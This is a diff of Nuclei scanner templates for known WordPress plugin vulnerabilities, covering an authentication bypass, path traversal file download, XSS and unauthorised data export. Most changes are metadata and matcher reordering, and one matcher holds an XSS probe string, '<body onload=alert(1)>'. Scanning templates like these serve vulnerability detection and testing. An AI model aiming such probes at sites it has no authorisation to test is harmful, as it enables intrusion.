9		-	tags: wordpress,xss,wp-plugin
	11	+	- https://wpscan.com/vulnerability/c465e5c1-fe43-40e9-894a-97b8ac462381
	12	+	tags: wordpress,xss,wp-plugin,wp
10	13
11	14		requests:
12	15		- method: GET
		skipped 3 lines
16	19		matchers-condition: and
17	20		matchers:
18	21		- type: word
	22	+	part: body
19	23		words:
20	24		- "<body onload=alert(1)>"
21		-	part: body
22	25
23	26		- type: word
24	27		part: header
		skipped 7 lines

■ ■ ■ ■ ■ ■

config/nuclei-templates/vulnerabilities/wordpress/wp-woocommerce-email-verification.yaml

1	1		id: wp-woocommerce-email-verification
2	2
3	3		info:
4		-	name: WordPress WooCommerce <1.8.2 - Authentication Bypass
	4	+	name: Email Verification for WooCommerce < 1.8.2 - Loose Comparison to Authentication Bypass
5	5		author: random_robbie,daffianfo
6	6		severity: critical
7		-	description: WordPress WooCommerce prior to version 1.8.2 contains a loose comparison issue which could allow any user to log in as administrator.
	7	+	description: \|
	8	+	Email Verification for WooCommerce Wordpress plugin prior to version 1.8.2 contains a loose comparison issue which could allow any user to log in as administrator.
8	9		reference:
9	10		- https://wpvulndb.com/vulnerabilities/10318
	11	+	- https://wpscan.com/vulnerability/0c93832c-83db-4053-8a11-70de966bb3a8
10	12		classification:
11	13		cvss-metrics: CVSS:10.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
12	14		cvss-score: 10.0
13	15		cwe-id: CWE-288
14		-	tags: wordpress,wp-plugin,woocommerce
	16	+	tags: wordpress,wp-plugin,woocommerce,wp
15	17
16	18		requests:
17	19		- method: GET
		skipped 25 lines

■ ■ ■ ■ ■ ■

config/nuclei-templates/vulnerabilities/wordpress/wp-woocommerce-file-download.yaml

1	1		id: wp-woocommerce-file-download
2	2
3	3		info:
4		-	name: WordPress WooCommerce < 1.2.7 - Arbitrary File Retrieval
	4	+	name: Product Input Fields for WooCommerce < 1.2.7 - Unauthenticated File Download
5	5		author: 0x_Akoko
6	6		severity: high
7		-	description: WordPress WooCommerce < 1.2.7 is susceptible to file download vulnerabilities. The lack of authorization checks in the handle_downloads() function hooked to admin_init() could allow unauthenticated
8		-	users to download arbitrary files from the blog using a path traversal payload.
9		-	reference:
	7	+	description: \|
	8	+	WordPress WooCommerce < 1.2.7 is susceptible to file download vulnerabilities. The lack of authorization checks in the handle_downloads() function hooked to admin_init() could allow unauthenticated users to download arbitrary files from the blog using a path traversal payload.
	9	+	reference: \|
10	10		- https://wpscan.com/vulnerability/15f345e6-fc53-4bac-bc5a-de898181ea74
11	11		- https://blog.nintechnet.com/high-severity-vulnerability-fixed-in-product-input-fields-for-woocommerce/
12	12		classification:
13	13		cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
14	14		cvss-score: 8.6
15	15		cwe-id: CWE-22
16		-	tags: wordpress,woocommerce,lfi
	16	+	tags: wordpress,woocommerce,lfi,wp-plugin,wp
17	17
18	18		requests:
19	19		- method: GET
		skipped 18 lines

		skipped 3 lines
4	4		name: Sassy Social Share <= 3.3.3 - Cross-Site Scripting
5	5		author: Random_Robbie
6	6		severity: medium
7		-	tags: wordpress,wp-plugin,sassy,xss
	7	+	description: \|
	8	+	AJAX endpoints which returns JSON data has no Content-Type header set, and uses default text/html. Any JSON that has HTML will be rendered as such.
	9	+	reference:
	10	+	- https://wpscan.com/vulnerability/4631519b-2060-43a0-b69b-b3d7ed94c705
	11	+	tags: wordpress,wp-plugin,sassy,xss,wp
8	12
9	13		requests:
10	14		- method: GET
		skipped 19 lines
30	34		- type: status
31	35		status:
32	36		- 200
	37	+

		skipped 3 lines
4	4		name: Social Metrics Tracker <= 1.6.8 - Unauthorised Data Export
5	5		author: randomrobbie
6	6		severity: medium
7		-	tags: wordpress,wp-plugin
	7	+	description: \|
	8	+	The lack of proper authorisation when exporting data from the plugin could allow unauthenticated users to get information about the posts and page of the blog, including their author's username and email.
	9	+	reference:
	10	+	- https://wpscan.com/vulnerability/f4eed3ba-2746-426f-b030-a8c432defeb2
	11	+	tags: wordpress,wp-plugin,wp,unauth
8	12
9	13		requests:
10	14		- method: GET
		skipped 2 lines
13	17
14	18		matchers-condition: and
15	19		matchers:
16		-	- type: status
17		-	status:
18		-	- 200
19	20		- type: word
	21	+	part: body
20	22		words:
21	23		- "Main URL to Post"
22		-	part: body
	24	+
	25	+	- type: status
	26	+	status:
	27	+	- 200
	28	+

up PoCs 2022-08-25